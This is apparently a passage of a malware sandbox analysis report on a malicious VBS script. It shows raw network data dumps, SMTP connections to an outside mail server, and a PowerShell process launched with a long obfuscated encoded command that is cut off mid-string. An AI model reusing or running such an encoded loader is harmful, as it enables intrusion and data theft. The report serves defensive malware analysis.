2022-10-03 14:13:31 UTC	197	IN	Data Raw: d7 5f ed 90 89 44 fe 36 9d d8 28 46 52 f6 81 50 73 bd 2e f5 be 03 e5 b3 8d a7 b9 e5 03 f4 b2 fe 53 77 1c 48 fd 82 a3 a0 42 75 26 b7 bb c5 75 55 37 17 b1 5e c5 ed bc 69 e5 e1 e3 8a dc a3 54 12 e9 01 2c 46 6e a2 1f 64 94 ab 7a af fe a6 91 66 6e 30 26 66 48 fd 89 87 66 99 64 f9 e4 9e 38 f6 b9 14 84 95 5d b9 54 fd 7c f4 9c 8b df 31 f9 9e 36 6c 39 84 bd 22 31 f7 0c f1 fb 5d 70 c3 7b a4 d4 e4 80 71 bb ec eb 98 af 44 0d 58 17 c0 31 7e ce ec 19 98 af 0c f5 48 e8 a7 48 56 68 f1 7b 0a e4 5c 6e c5 8b 7a 57 16 69 56 50 19 55 d8 3e dc fa 39 1e 46 a0 52 46 40 17 7c 48 19 54 3e f3 dc 98 f2 0e b7 2d 7e 35 13 41 c5 53 08 87 b0 b7 1c c5 0d a6 1f af da b5 b7 4d 13 57 f3 6c b9 49 14 a4 b0 63 71 07 d4 c6 79 fa bf df 09 55 2c 04 b3 fb c2 fa cc 71 8e 97 08 87 68 0b 4c 9b d4 49 Data Ascii: _D6(FRPs.SwHBu&uU7^iT,Fndzfn0&fHfd8]T\|16l9"1]p{qDX1~HHVh{\nzWiVPU>9FRF@\|HT>-~5ASMWlIcqyU,qhLI
2022-10-03 14:13:31 UTC	199	IN	Data Raw: f6 b0 69 61 d3 c1 ae fc 25 98 5c 46 82 0f bc ba c8 80 01 1c f6 e1 59 d6 28 97 96 37 54 e9 df f3 9b 2c eb 19 d7 d2 13 23 ce 46 38 14 55 25 80 3c c9 ba 0d 04 79 44 89 f1 3d f1 b2 80 ed db 46 e8 16 3e 1d 75 57 9f 64 06 0f e2 de fe a3 42 eb 42 23 a9 e6 94 03 58 49 5d 28 ad 71 7a f1 57 d1 93 a8 93 94 51 8e 9c 5e 6a b6 2c a3 6d 5e 58 8d f3 a9 8f 34 23 ed f8 a9 06 62 38 1c ca 77 0f a6 c2 5b 4d 50 c7 cd 84 28 d2 21 00 cc 6b ed e5 07 52 73 f4 e0 79 f7 18 c8 ef 60 09 00 05 0b 07 d9 c3 69 24 26 3b cf 29 04 82 6e ba 20 87 7a 79 fb ec c7 0e f6 c1 7b 3f 5e c9 1d 0a fd 45 96 59 ea 8a 6c 53 25 4c ab 2e d5 fb f9 31 0c 02 15 db 7d 11 c5 6f c8 f4 e1 aa 3d 20 ed aa 48 c4 47 51 af e4 70 eb 5c 93 79 73 96 c7 42 70 9e 4e 7a 11 41 62 a4 ee b3 cc 32 e8 26 d9 27 56 df 48 4c 07 1d Data Ascii: ia%\FY(7T,#F8U%<yD=F>uWdBB#XI](qzWQ^j,m^X4#b8w[MP(!kRsy`i$&;)n zy{?^EYlS%L.1}o= HGQp\ysBpNzAb2&'VHL
2022-10-03 14:13:31 UTC	200	IN	Data Raw: 3a ab 7b 6d 8e fe 2c 21 84 35 9c ac f5 e8 fa c0 67 3c 57 6a 3f 92 4f 3e a4 15 2e c9 48 3e 71 e4 1b 8c 7e 05 f5 25 13 de f1 19 bb 91 6b 43 8a d5 3f 06 b1 af 9d d7 40 b5 b4 8b 4f cf 23 97 c3 24 4c 43 84 d9 70 5b cd 01 e2 aa 16 ff a8 de 83 bf e7 0b f4 bf c3 44 76 1e 21 dc 89 a7 c9 62 54 0f 99 ac d2 71 21 00 29 b8 68 dc e7 aa 61 d0 fd f8 fc d2 a2 45 3f b9 34 2c 4a 70 ba 7a 67 b4 8c 69 bc f5 b3 8b 7d 3d 32 31 64 7e dd 99 a5 66 93 7c e4 80 b2 1a b3 95 33 a6 83 44 a3 63 91 74 e2 8d 95 ff 39 f5 8d 33 5d 3f 8d bd 3f 37 ef 11 95 f9 4a 04 de 7b b9 d8 fa 80 3e ac ec f1 86 97 4a 01 41 3d db 2c 7d ea 9e 31 8b b2 2b f8 5b 9a ad 61 4c 74 e8 1a 3b da 4a 40 d0 81 7b 42 10 69 47 41 0c 55 d8 18 fd ec 35 02 56 c5 62 05 61 1e 69 5f 34 50 31 c7 ca 84 e2 6b 87 6e 4b 29 17 71 e5 Data Ascii: :{m,!5g<Wj?O>.H>q~%kC?@O#$LCp[Dv!bTq!)haE?4,Jpzgi}=21d~f\|3Dct93]??7J{>JA=,}1+[aLt;J@{BiGAU5Vbai_4P1knK)q
2022-10-03 14:13:31 UTC	201	IN	Data Raw: fc a8 f7 97 be 8b 85 af a1 a8 77 87 26 85 ad 27 c2 ad 52 e3 33 f8 e3 b9 76 22 13 68 aa 6e 4e 26 6d 55 32 11 58 5b db 5f 7d 62 8e 72 30 d6 ba ef ee f6 4b 34 ca ee b0 6c 7c d5 d6 a4 ea 3f 9e 40 35 e5 39 ad 91 db 91 12 07 ec f7 5e db 4d 83 f3 11 6d c9 8c bb c3 77 c6 08 dc bb 34 33 ed 53 25 05 5f 25 bd 29 f7 9b 3d 1d 74 6a 99 f1 21 82 dd b7 d7 e6 69 e9 03 39 19 6a 4d a9 64 72 39 e8 ad cd a3 5b 87 68 32 af e0 e6 0d 49 44 02 37 bf 53 7a f8 48 9e 87 9e fe b7 4a 94 f7 79 5d 82 39 b2 7e 6a 3d aa d7 a9 89 2a 21 ec 8c 83 69 43 10 0b c7 46 08 8c c9 4c 58 54 cd d3 95 1b d4 3f 73 bf 4b f5 db 27 53 79 e8 dc 0f db 21 d9 cc 42 1c 1c 7d 15 62 ee f0 54 3d 27 3f dd 5b 29 91 6e b0 3c 9b 14 4b fb e1 ce 2e 8f d5 6a 2e 6c da 1d 00 e1 59 f8 6a e6 9f 50 52 4a 47 b7 5a d8 dd ec 3d Data Ascii: w&'R3v"hnN&mU2X[_}br0K4l\|?@59^Mmw43S%_%)=tj!i9jMdr9[h2ID7SzHJy]9~j=*!iCFLXT?sK'Sy!B}bT='?[)n<K.j.lYjPRJGZ=
2022-10-03 14:13:31 UTC	202	IN	Data Raw: c1 60 ae 72 03 6c 59 09 50 63 f0 23 5d a9 d1 75 08 09 f3 1b f1 8d a9 10 a1 d8 64 97 69 fb e7 ce 44 fa 76 3e 74 59 9d f8 36 e2 cb cc 50 6f 3e 58 7a be 98 18 84 29 e6 03 0a cd 90 41 61 61 9b e8 d2 00 e4 9f a2 15 71 82 f4 48 61 02 4c d0 fb bf c8 0d da 1f af 66 65 d2 76 8f 23 60 b2 97 e9 15 f3 0f 21 e1 b3 bf 98 d5 d9 e1 a3 ad 52 e4 e4 24 8e 45 f3 b3 44 06 30 8b 8f 13 2a 8d 7f 07 32 7d 83 5c 02 d0 f3 9d 78 17 26 bc a1 e1 78 a1 68 f5 51 5d 02 bb f4 e5 49 75 18 2f 5c 44 d5 22 bb 82 df 0d a7 12 8d f2 b3 e7 30 61 fb d4 5b 2a 1e ce 68 a1 dc fe 19 dc 86 c4 64 04 39 75 55 11 29 9a cc d6 15 fc 17 b0 80 e9 ca 07 fc 77 f5 ed 30 c8 1f 99 16 a7 f9 d8 33 af 90 cc 5e 19 43 69 1c 56 7e 80 64 84 1f 3a 75 81 3a d7 a5 9a d6 39 c0 9b 04 c0 d1 a2 7f 38 ff 95 4b 92 bb 8c f7 cf d4 Data Ascii: `rlYPc#]udiDv>tY6Po>Xz)AaaqHaLfev#`!R$ED02}\x&xhQ]Iu/\D"0a[hd9uU)w03^CiV~d:u:98K
2022-10-03 14:13:31 UTC	204	IN	Data Raw: 30 a4 5f 06 d2 6a d7 ac 3d 75 45 6f 95 3e a1 53 1f 69 20 6d 63 3e 1e cf e7 af 19 33 64 42 27 cc 16 b0 d6 e3 96 fd fb 21 31 98 04 e3 c6 6e 2b 08 45 eb ba c0 ef 94 2a 8b f2 d5 f6 e2 d7 d0 d4 75 de 50 f4 bf e5 43 d0 b1 1d 74 97 92 d8 7e 41 76 1d fb 33 25 5a 0c 2b 22 7a 27 3a fe 3f 1a 1c 93 13 50 b9 c8 96 ea b5 38 51 ab 9e d4 29 15 a7 b7 c3 9f 50 ec 3d 30 83 5c d9 cd 8f e6 21 66 9f 87 24 aa 5f b0 8e 6d 35 8a e9 c3 aa 1c b7 64 a1 bb 64 44 84 3b 4c 70 3e 2b d9 59 aa cc ce 51 07 84 c9 97 da bb b7 c7 89 ae 15 c0 77 4c 79 07 36 8d 12 75 62 99 cf fd de 24 e5 2a 13 dd d1 86 34 35 38 02 7c ce 05 17 92 24 d3 e9 c3 81 f2 3a ed f6 33 06 f6 60 c1 02 25 40 c6 8f dc e2 52 5c 90 ea 7a fc 04 53 79 ac b6 d9 dd aa 31 0b 20 b3 eb f2 6f b9 42 63 cc 2e 81 80 57 21 16 90 a1 8f 92 Data Ascii: 0_j=uEo>Si mc>3dB'!1n+EuPCt~Av3%Z+"z':?P8Q)P=0\!f$_m5ddD;Lp>+YQwLy6ub$458\|$:3`%@R\zSy1 oBc.W!
2022-10-03 14:13:31 UTC	205	IN	Data Raw: 72 6a 53 a9 5d f2 6d d2 5a 66 1e 38 64 5b 08 9e ac 40 30 be 6d ad d2 71 6d 3e 09 30 b2 2e fd f2 1f 7f 70 1d e2 87 a7 59 3d f9 23 3d a8 65 fc 8d 94 bd d1 4d 8f c5 75 2a 7e 1f 7f 5a 15 47 c3 2c 23 41 d4 fe 72 1a 05 76 e3 f5 8c 29 c1 a9 cc e3 6f 6d e1 62 c5 40 f3 7c 34 5a 45 9a f7 1d e4 cf d5 4d 69 0c d8 a1 a6 bd 10 9c 3a e7 15 0f c6 94 74 71 e0 4c e3 ce 86 e1 94 a0 1b 71 82 e8 50 ea 07 50 c8 73 53 e9 1d 5a 03 b5 03 f7 9b 9a 87 05 41 ba 94 e9 31 f2 05 2f ec b0 bf 9c c0 d4 e1 a3 ad 52 f1 e2 29 a7 64 f4 af 49 2a 3f 8c 89 15 31 a8 6c 96 47 ba 98 db d9 c1 d6 96 77 92 df a8 01 19 77 24 8b 93 da a7 19 32 68 fc c0 b5 0c 28 50 4c d2 2c b1 8e c2 09 bd 95 8c fd a4 47 f8 6a e1 75 5d 2e 03 cb 72 32 a5 fc 3e df 8d de ed 0e 38 5b 5a 18 3c 9d e4 d2 34 f4 1c 93 83 fe 6a f7 Data Ascii: rjS]mZf8d[@0mqm>0.pY=#=eMu~ZG,#Arv)omb@\|4ZEMi:tqLqPPsSZA1/R)dI?1lGww$2h(PL,Gju].r2>8[Z<4j
2022-10-03 14:13:31 UTC	206	IN	Data Raw: bd e6 08 a9 a5 22 e9 9c 38 aa 6c 83 63 c6 f6 55 7c 71 92 0f 5f 0f 54 4d 31 78 7a a3 6a 7e 0a af 7a 47 3b a8 a8 04 54 af 7c a0 b7 37 2a 60 22 e6 d9 2c f1 08 9f dd ac 50 0c c8 ec c5 b5 b8 bc 58 73 1c 29 a3 7f 1d 73 a9 68 63 16 1e c5 e5 80 1c 2f e6 fe 28 e4 17 91 da e5 90 fb fb 07 22 14 d5 e2 e0 7c b9 4a 60 f8 a8 43 0b 84 ba 38 3b d9 df ed de d8 c3 f5 23 49 ee 2f bc a7 e2 33 89 62 16 82 d2 f7 54 7b 1b f2 38 33 d3 1d 31 7e 65 33 aa 6b 34 1a 2e c2 15 4f 3b 11 90 e9 b7 2b d1 6b 92 d2 28 17 a6 af d5 1c 89 fe 3e 33 90 dc 19 dc 09 34 67 ee 1a 91 ac 27 5f 64 56 6d 3b 8a ef ca b0 95 be 6e 24 aa 6a 41 89 23 5e f0 f7 37 53 88 ba 5c 81 7a 94 d7 f7 85 59 9f a0 46 59 a1 03 8a 63 cc b0 02 22 cc 9d be 6e 97 cf 39 16 32 af 2a d7 18 91 94 64 3d bd 06 7f cc 1d 8f 90 26 d1 f5 Data Ascii: "8lcU\|q_TM1xzj~zG;T\|7`",PXs)shc/("\|J`C8;#I/3bT{831~e3k4.O;+k(>34g'_dVm;n$jA#^7S\zYFYc"n92d=&
2022-10-03 14:13:31 UTC	207	IN	Data Raw: c0 e1 13 dc 9b 35 5c da 86 c3 c1 50 85 a8 a6 69 c0 4a 97 7a 10 ea 71 82 94 29 e7 5d 2f 08 08 cd 05 8a 7e 2a 64 ed 52 4f 23 da de 20 66 cf 59 1d 72 78 ba 52 ec 77 54 52 ad 6e f0 7d d7 50 6a 02 59 08 26 1a 7f 71 74 22 fb 65 98 d7 7a 6f 37 13 3c a7 2f c1 ef 1e 7e 63 06 f8 86 bf 49 b5 28 22 25 b3 67 e5 88 9d bd cd 49 b2 c1 6f 2a 7c 0e 65 57 00 5f e6 30 3e 4e bc ec 69 00 04 6e fb f8 9a af 0a 37 fc e1 72 68 fb e5 f7 45 fd 76 2d 7f 56 13 68 1c c3 c9 c2 55 71 1b 45 7d a6 bd 1d 9e 3b f7 8a 97 c3 b1 52 72 ef 48 f8 42 1c f9 09 6c 02 e3 cb 13 5c e7 0c 48 43 e6 52 cf 3f 5a 12 b6 f5 78 1d 6c 83 34 c0 7a 8d 6c d8 fd 13 a6 2d a7 1f 54 c9 cd 69 7b 28 b3 f9 fb a3 33 41 da ae 50 a2 fe 87 a9 1d 3d 8c 6b 96 46 73 95 33 dd c2 cb 97 6c 86 56 aa 25 58 6a 21 99 e3 d1 a2 10 3b 65 Data Ascii: 5\PiJzq)]/~dRO# fYrxRwTRn}PjY&qt"ezo7</~cI("%gIo\|eW_0>Nin7rhEv-VhUqE};RrHBl\HCR?Zxl4zl-Ti{(3AP=kFs3lV%Xj!;e
2022-10-03 14:13:31 UTC	209	IN	Data Raw: c7 45 b5 92 e2 c9 7e d6 ba d5 37 8b 6b 26 b9 04 d1 27 6c d8 b8 2d 1a 68 a1 b2 14 99 cf b1 72 bb f1 47 d6 b5 a3 80 a7 1f 89 cd 75 4f 0a 6d a8 f0 bf 33 c1 a9 55 af 65 e7 a9 a4 de f1 80 a8 22 74 84 6a ca e4 58 5b 71 82 90 24 88 65 40 27 76 77 a3 7d ff 1b ac 7b 9f 0d bd f8 11 12 2f f5 a1 f5 b6 09 6e 0f f3 e5 ac 1d 09 ad 5c a6 4b 12 c8 ec b0 af 3d 29 50 6f 93 36 b4 d6 11 73 a8 f0 72 bf 7a df 60 3d 14 33 68 44 3d 45 1f 82 54 78 96 fd f9 21 31 84 8d 17 e8 39 3e 93 7d ff 38 2c ec 8b ba 3b ee dc f1 e2 ca df 51 aa c7 5a 7d a1 70 bc 42 ec 89 62 16 9f d2 f7 c9 78 01 fb 34 2f 40 8d 35 6c 77 2f 20 bc 32 01 0b d1 96 51 ab 49 9a fb a4 ba 10 a9 94 c0 3a 97 4a b1 c9 90 58 f9 28 b6 c3 5e d7 dc 08 f8 60 7f 1c f2 2e ac 5f 65 9a 61 32 8b e0 c5 ab 01 bd fe 48 b9 6b 54 0d 33 41 Data Ascii: E~7k&'l-hrGuOm3Ue"tjX[q$e@'vw}{/n\K=)Po6srz`=3hD=ETx!19>}8,;QZ}pBbx4/@5lw/ 2QI:JX(^`._ea2HkT3A
2022-10-03 14:13:31 UTC	209	IN	Data Raw: cd 8d b9 9d 91 f2 bb c9 23 e0 7c 40 4f af fb cf 74 28 cc f6 2b 5c 8b d5 ef 08 33 70 53 1b 34 8c 6c 0a 15 e4 93 9c 95 e9 ca 2b fa 45 77 e0 23 df 97 38 1d 95 79 63 a1 d7 9a f1 5a 0a d1 7c e5 4d 50 aa 62 86 8b 3d f0 5c 39 c4 2c 98 e1 2c 4b 54 84 cb 42 2f 6c 37 70 ba 57 1d 90 8c f7 e2 db 66 8d 34 e6 e0 06 24 14 81 19 76 a9 20 09 b8 e5 19 3c 6a 6a 17 a4 fe 34 b8 51 9a 8f 51 7a 21 f5 27 5e 06 75 99 f6 71 27 d3 b9 bd fa 83 79 45 f0 38 42 e6 09 ae 3e 69 ed c8 cb 14 8e 7e cb 6d c5 b7 cf bf 16 64 a2 bd 0b 5f ba 79 de ad 33 1c 7d 95 a8 01 8a fd 30 bd 3a 4a c8 de 80 b1 1d 74 02 9c 42 6b c0 14 ff 80 e1 b2 26 d2 a9 46 be f8 09 b3 2a 3b f7 8f 26 a5 e8 8b 6a cc e2 5e 78 63 10 86 45 93 4b 4b 35 70 71 bb 58 ff 06 bd fc 93 36 a6 ee 0a 1c a8 28 a2 ef 25 87 71 1b c6 f0 20 d5 Data Ascii: #\|@Ot(+\3pS4l+Ew#8ycZ\|MPb=\9,,KTB/l7pWf4$v <jj4QQz!'^uq'yE8B>i~md_y3}0:JtBk&F*;&j^xcEKK5pqX6(%q
2022-10-03 14:13:31 UTC	211	IN	Data Raw: 70 34 50 9f a0 47 39 b2 1b 91 6e 51 7a 01 04 dc 00 60 ea 20 d0 bf e6 36 b4 29 d7 7d b3 93 6b 28 2f 82 a3 cd 0f 8e 98 31 c3 75 06 92 d5 bf e1 f9 26 10 fe 4e cc 04 3f d9 d2 89 d5 f4 da d1 83 fb f2 74 0f 76 7e b3 23 6e 5f 71 39 1a a7 ae b6 e2 e9 7d 47 61 4d 22 8f 8a 79 3d 18 9e b7 8e 7f 64 3d a2 1c 7c f2 e8 7e e2 38 a8 3a 5a 50 42 3c f4 4c d3 9d d3 51 f0 94 d0 93 9f 2a 71 ee a8 0c cb a8 82 61 72 9c 32 79 21 8b f9 80 89 37 be 4a 54 97 bd 83 5c 7a e7 ee a7 09 7e a1 14 c0 9b 8f de 60 76 0a dd 3b 33 3a 37 6e 87 1a 88 3f f3 10 1f e5 28 30 6d e8 39 8e db 09 14 e1 ad d8 bf 41 1d 97 ac 6a 39 b4 31 27 7c 7b bd 64 4a 4e 1f 1f fa 86 26 51 c3 8e d9 5f 43 93 86 aa 60 d2 c9 9f 75 95 2a 75 84 92 29 e8 5d 3c 05 08 cb 05 8a 7e 21 66 ea 5a 48 0d c6 c6 2b 72 c2 58 04 6c 7a a8 Data Ascii: p4PG9nQz` 6)}k(/1u&N?tv~#n_q9}GaM"y=d=\|~8:ZPB<LQqar2y!7JT\z~`v;3:7n?(0m9Aj91'\|{dJN&Q_C`uu)]<~!fZH+rXlz
2022-10-03 14:13:31 UTC	212	IN	Data Raw: 3c 18 20 e8 2f a0 4c fc 8e 41 37 25 04 5c 1c 22 99 ee 5e c5 7d 9f d3 fe c3 ca 86 78 17 0a af 34 09 e9 f8 9b e9 df 84 17 2f 74 e6 49 61 04 24 56 4c da 3e 31 41 d7 04 bd 9b 91 f2 bd cf 39 6e e1 5d 50 27 16 db 6b a3 08 fa 37 d3 81 c3 f7 89 e0 54 51 1c 34 8c 6c 0a 15 e3 03 13 59 f9 44 f8 fd 57 f7 fe af 44 19 92 33 87 fc cd a3 57 97 ed 42 06 51 ee f8 41 dd 58 67 9b 90 29 70 80 39 c4 2f 85 fd 1e cf 94 80 c4 c6 2b 6a 28 70 9c 59 06 8c 1e ab ef d3 79 13 e3 ea e0 00 33 1d 9a 07 7b a9 2b 0f bb ea 16 39 63 6f 0b 36 eb d1 b3 51 83 8a 58 7b 25 c6 3d 43 0e 62 0b ab e5 3d 55 b6 ae f1 84 e8 18 25 31 57 64 18 a5 22 e5 16 dd df 1b 8c 7e c0 6d ce a2 c2 aa 1b 6b 26 ac 1c c2 2a 6c d3 ad 35 09 70 aa bd 9a 0a e3 b0 64 26 5d 54 d7 88 a6 80 ac 1e 8b d0 60 c9 1b 7a 34 f9 ac 3e c1 Data Ascii: < /LA7%\"^}x4/tIa$VL>1A9n]P'k7TQ4lYDWD3WBQAXg)p9/+j(pYy3{+9co6QX{%=Cb=U%1Wd"~mk&*l5pd&]T`z4>
2022-10-03 14:13:31 UTC	213	IN	Data Raw: a7 28 53 a7 da c7 f2 50 89 39 7c 82 32 d9 a8 89 9b 75 6e 9f 83 2c 86 4d e0 96 65 32 de ed b9 a2 75 af 12 a5 c8 65 2a 8c 5e 4c 05 26 4c d2 36 a8 b0 4c 68 15 06 f0 85 58 32 b6 db 8a af 07 8d 72 1f 78 72 24 af 1d 1b 6a ff de de c6 70 a9 52 57 a0 95 f1 64 74 3d 6c 7e aa 1d 60 94 24 d1 0d da 93 c7 3f ed c7 3b 2e f0 70 c2 3a 2d 68 de b3 db 84 5a 74 9e f8 fa 45 01 51 79 bf 36 3a df c5 38 64 26 c7 a3 b4 69 c5 46 00 cc 4d 81 f6 77 48 16 e0 a5 7b 92 1f bc c1 12 00 73 05 6c 62 ad bc 3d 4d 45 60 bc 21 4d c0 1c 99 44 8b 14 61 92 e8 ab 2b f6 c3 1e 39 01 f9 6f 06 99 4f f8 43 83 eb 00 20 25 0e ce 74 8a 89 8b 7a 68 56 7b 81 14 41 a9 1c c8 e7 84 f7 62 65 88 85 29 df 2b 51 ec f3 15 fd 39 93 0d 7b f7 c7 31 3e ed 4a 0e 23 14 74 c1 aa d6 cb 53 fe 4a c8 64 47 ba 19 29 5f 69 5f Data Ascii: (SP9\|2un,Me2ue*^L&L6LhX2rxr$jpRWdt=l~`$?;.p:-hZtEQy6:8d&iFMwH{slb=ME`!MDa+9oOC %tzhV{Abe)+Q9{1>J#tSJdG)_i_
2022-10-03 14:13:31 UTC	215	IN	Data Raw: e6 08 0a cc 91 54 73 e1 46 e9 c0 81 e8 89 a5 13 63 02 19 5a e0 0e 59 c1 7b 5a c9 1f 5b 13 a7 77 e5 1b 6b 81 25 40 b3 85 69 f8 fd 02 26 e4 a1 3f 55 c8 dc e9 b2 2d 9b f9 ea 21 ae 44 f2 ae 41 22 37 84 81 1d 37 88 6d 87 c7 73 91 dc de c2 cb 93 6a 97 d7 ae 21 18 6a 21 99 e7 d1 a0 10 3b 61 f4 c9 bc 05 21 58 44 d4 2c b3 84 df 0c b5 93 8c fc b5 c7 31 60 e9 55 5e 2f 1e ce 7a 20 d1 f8 39 dd 87 d6 e5 09 3d 55 54 10 21 9e ec d7 14 f6 12 90 80 fb 4a f6 fb 57 f6 ec 2d cd 17 91 13 87 f9 ca b3 56 96 ec 5f 18 51 e9 ed 50 5e 81 65 95 9e 2f 70 81 38 d6 ad 94 f4 3e cb 89 85 d9 c3 23 62 2a 7e b4 59 13 9e 9e 76 ee c6 68 90 3a e8 ee 0e 39 1a 9c 1a 7e b4 2e 01 b3 e2 1e 32 64 69 05 24 6b 3c b6 59 9e 8f 50 72 22 c5 20 46 13 67 19 2b 70 35 52 b5 b3 f4 96 6b c5 2d 39 50 67 05 a0 30 Data Ascii: TsFcZY{Z[wk%@i&?U-!DA"77msj!j!;a!XD,1`U^/z 9=UT!JW-V_QP^e/p8>#b*~Yvh:9~.2di$k<YPr" Fg+p5Rk-9Pg0

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 3, 2022 16:13:55.021400928 CEST	587	49809	216.218.206.36	192.168.11.20	220-fmt06.web.com.ph ESMTP Exim 4.95 #2 Mon, 03 Oct 2022 22:13:55 +0800 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 3, 2022 16:13:55.022090912 CEST	49809	587	192.168.11.20	216.218.206.36	EHLO 048707
Oct 3, 2022 16:13:55.022679090 CEST	587	49810	216.218.206.36	192.168.11.20	220-fmt06.web.com.ph ESMTP Exim 4.95 #2 Mon, 03 Oct 2022 22:13:55 +0800 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 3, 2022 16:13:55.023272038 CEST	49810	587	192.168.11.20	216.218.206.36	EHLO 048707
Oct 3, 2022 16:13:55.203537941 CEST	587	49809	216.218.206.36	192.168.11.20	250-fmt06.web.com.ph Hello 048707 [102.129.143.18] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPE_CONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Oct 3, 2022 16:13:55.204047918 CEST	49809	587	192.168.11.20	216.218.206.36	STARTTLS
Oct 3, 2022 16:13:55.204478979 CEST	587	49810	216.218.206.36	192.168.11.20	250-fmt06.web.com.ph Hello 048707 [102.129.143.18] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPE_CONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Oct 3, 2022 16:13:55.210037947 CEST	49810	587	192.168.11.20	216.218.206.36	STARTTLS
Oct 3, 2022 16:13:55.387283087 CEST	587	49809	216.218.206.36	192.168.11.20	220 TLS go ahead
Oct 3, 2022 16:13:55.393198967 CEST	587	49810	216.218.206.36	192.168.11.20	220 TLS go ahead
Oct 3, 2022 16:13:55.974649906 CEST	587	49809	216.218.206.36	192.168.11.20	421 fmt06.web.com.ph lost input connection
Oct 3, 2022 16:13:55.974709034 CEST	587	49810	216.218.206.36	192.168.11.20	421 fmt06.web.com.ph lost input connection

Target ID:	0
Start time:	16:11:11
Start date:	03/10/2022
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PUMP mt310143121.vbs"
Imagebase:	0x7ff78d630000
File size:	170496 bytes
MD5 hash:	0639B0A6F69B3265C1E42227D650B7D1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Target ID:	20
Start time:	16:12:34
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsACgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBHAGkAbABWAG8AYQBTAHUAZABJAG4AbwBNAHkAZwBHAHQAZQBTAHQAbgBBAHIAZQBGAGEAdABMAG8AMQAKAFMAcAB7AEEAcwBbAEcAbgBEAGIAZQBsAFUAbgBsAEIAdQBJAEYAeQBtAEQAbwBwAEYAYQBvAFYAZQByAFQAcgB0AFUAbgAoAFAAaAAiAEsAZQB1AFUAaQBzAFMAdQBlAFAAcwByAEYAbgAzAEEAcAAyAHMAawAiAHQAcgApAEcAcgBdAEUAbgBwAFAAaQB1AE8AcABiAFMAdABsAHMAYQBpAFMAcABjAFYAaQAgAFMAdQBzAFAAbwB0AEgAYQBhAFMAawB0AEIAZQBpAFMAYwBjAFUAbgAgAEQAaQBlAEUAcgB4AFAAdQB0AFMAdgBlAEEAcgByAFcAYQBuAEkAbgAgAEcAZwBpAFAAZQBuAE0AYQB0AFUAbgAgAHQAcgBDAFAAaQByAEEAYQBlAEQAZQBhAFMAbAB0AFMAdABlAEsAbABNAEIAdQBEAFAAbABJAGkAbgBXAFUAbgBpAEUAbABuAHMAdABkAFIAZQBvAFYAYQB3AE0AYQAoAEwAYQBpAEEAbgBuAFMAawB0AFMAdAAgAEIAZQBOAEYAbAB2AFUAbgBoAEkAcgBpAEUAbQBlAEMAbwAsAEEAbgBpAEMAaABuAFAAcgB0AEQAaQAgAEYAbwBIAEwAYQBlAEsAbABhAEIAZQAsAGQAcgBpAFQAYQBuAEYAbwB0AEIAZQAgAFIAZQBoAFAAYQBhAEYAbwB0AGEAZgBjAEIAcgBoAFQAcgAsAEwAYQBpAEIAcgBuAEYAbwB0AFQAZQAgAFUAbgBQAFQAbwBpAEIAbwBuAE0AYQBpAEQAaQAsAE0AZQBpAE4AbwBuAEYAagB0AEMAaAAgAGQAdQBPAE0AYQB2AEgAZQBlAE8AcgByAFMAYQBpAFMAbAAsAEYAbwBpAE4AYQBuAHIAZQB0AE8AdgAgAFAAZQBSAHUAbgBlAEEAbgBjAE8AYgBpAE0AbwB0AEUAbABhAHAAYQAsAFIAZQBpAFMAYQBuAEMAYQB0AEgAYQAgAFAAcgBPAEcAbwBwAEEAdQBrAFMAbgByAE4AbwAsAEIAcgBpAG0AYQBuAEkAbgB0AEQAYQAgAEEAdQBDAFIAaQByAFAAcgBvAEgAYQBjAEgAZQBrAHMAawAsAGEAawBpAFIAdQBuAEgAeQB0AE0AZQAgAE0AYQBBAFAAaAB1AE4AYQB0AFkAbwBvAEEAcwBzAFMAZAAsAEcAdQBpAEEAZgBuAEEAcAB0A